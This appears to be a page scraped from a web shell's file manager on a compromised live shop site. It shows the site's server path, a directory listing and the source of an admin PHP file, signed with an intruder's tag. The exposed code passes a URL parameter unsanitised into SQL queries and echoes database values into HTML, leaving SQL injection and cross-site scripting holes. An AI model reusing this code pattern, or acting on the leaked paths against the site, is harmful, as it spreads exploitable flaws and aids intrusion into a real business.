Submit
Path:
~
/
home
/
caratcollect
/
domains
/
24caratcollection.com
/
public_html
/
admin
/
ajax
/
File Content:
categoryAjax.php
<?php include("../library.php"); $q=$_GET['q']; $_SESSION['category']=$q; ?> <label><b>Product Category</b></label> <select class="form-control" name="productCatId" requited onChange="productAjax(this.value)"> <option>select product category</option> <?php $result=$mysql->m_Query("select distinct(productId) from tblproduct where categoryId=$q"); while($row=$mysql->m_FetchObject()) { $result=$mysql2->m_Query("select * from tblproductcategory where id=$row->productId"); $row2=$mysql2->m_FetchObject(); echo "<option value=$row2->id>$row2->name</option>"; } ?> </select>
Submit
FILE
FOLDER
Name
Size
Permission
Action
auditAjax.php
0 bytes
0755
categoryAjax.php
664 bytes
0644
mobileNoAjax.php
204 bytes
0644
productAjax.php
510 bytes
0644
stateAjax.php
488 bytes
0644
N4ST4R_ID | Naxtarrr